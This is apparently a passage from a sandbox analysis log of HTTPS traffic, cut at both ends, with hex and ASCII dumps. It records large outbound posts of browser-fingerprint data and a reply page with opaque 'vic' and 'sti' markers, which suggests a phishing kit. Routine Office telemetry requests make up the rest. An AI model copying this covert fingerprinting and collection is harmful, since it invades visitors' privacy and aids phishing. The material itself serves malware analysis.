                                                        2024-11-12 15:26:59 UTC16384OUTData Raw: 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65
                                                        Data Ascii: ement%22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObse
                                                        2024-11-12 15:26:59 UTC16384OUTData Raw: 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b
                                                        Data Ascii: Element%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+
                                                        2024-11-12 15:26:59 UTC16384OUTData Raw: 74 69 6f 6e 2b 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e
                                                        Data Ascii: tion+AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSen
                                                        2024-11-12 15:26:59 UTC16384OUTData Raw: 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25
                                                        Data Ascii: ronousOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%
                                                        2024-11-12 15:26:59 UTC16384OUTData Raw: 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69
                                                        Data Ascii: 2%2C%22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22Medi
                                                        2024-11-12 15:26:59 UTC16384OUTData Raw: 69 62 69 6c 69 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67
                                                        Data Ascii: ibilityautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchReg
                                                        2024-11-12 15:26:59 UTC8062OUTData Raw: 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61
                                                        Data Ascii: ateCDATASection%22%3A%22function+createCDATASection%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createComment%22%3A%22function+createComment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+createDocumentFragment%28%29+%7B+%5Bna
                                                        2024-11-12 15:27:01 UTC358INHTTP/1.1 200 OK
                                                        cache-control: no-store
                                                        content-type: text/html; charset=UTF-8
                                                        content-length: 364
                                                        date: Tue, 12 Nov 2024 15:27:01 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        connection: close
                                                        2024-11-12 15:27:01 UTC364INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 51 54 4a 4e 56 45 56 35 54 55 52 4a 4d 46 5a 55 52 58 68 4e 56 45 56 33 54 6d 70 42 4e 51 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68 4f 27 20 63 72
                                                        Data Ascii: <!DOCTYPE html><html id='html' sti='VlZORlVqQTJNVEV5TURJMFZURXhNVEV3TmpBNQ==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' cr


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.64972813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:00 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:00 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:00 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 2160
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                        ETag: "0x8DC582BA3B95D81"
                                                        x-ms-request-id: 216c6b49-701e-001e-23a0-34f5e6000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152700Z-17df447cdb56mx55hC1DFWvbt40000000910000000009wf6
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:00 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192.168.2.64972713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:00 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:00 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:00 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 2980
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                        ETag: "0x8DC582BA80D96A1"
                                                        x-ms-request-id: 26663d07-401e-0029-2faf-319b43000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152700Z-16547b76f7fcjqqhhC1DFWrrrc0000000fqg00000000krbf
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:00 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192.168.2.64972913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:00 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:00 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:00 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 408
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                        ETag: "0x8DC582BB56D3AFB"
                                                        x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152700Z-16547b76f7fq9mcrhC1DFWq15w0000000fqg00000000n44v
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:00 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.64972513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:00 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:00 UTC517INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:00 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 3788
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                        ETag: "0x8DC582BAC2126A6"
                                                        x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152700Z-16547b76f7fwvr5dhC1DFW2c940000000fqg00000000e5dw
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:00 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.64972613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:00 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:01 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:01 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 450
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                        ETag: "0x8DC582BD4C869AE"
                                                        x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152701Z-16547b76f7fr28cchC1DFWnuws0000000fvg00000000hy1v
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:01 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.649730184.28.90.27443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:01 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                        Range: bytes=0-2147483646
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-11-12 15:27:01 UTC515INHTTP/1.1 200 OK
                                                        ApiVersion: Distribute 1.1
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        Content-Type: application/octet-stream
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        Server: ECAcc (lpl/EF06)
                                                        X-CID: 11
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-weu-z1
                                                        Cache-Control: public, max-age=177518
                                                        Date: Tue, 12 Nov 2024 15:27:01 GMT
                                                        Content-Length: 55
                                                        Connection: close
                                                        X-CID: 2
                                                        2024-11-12 15:27:01 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192.168.2.64973113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:01 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:01 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:01 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 474
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                        ETag: "0x8DC582B9964B277"
                                                        x-ms-request-id: ee786005-101e-0065-140e-2d4088000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152701Z-16547b76f7f7scqbhC1DFW0m5w0000000fhg00000000p95p
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
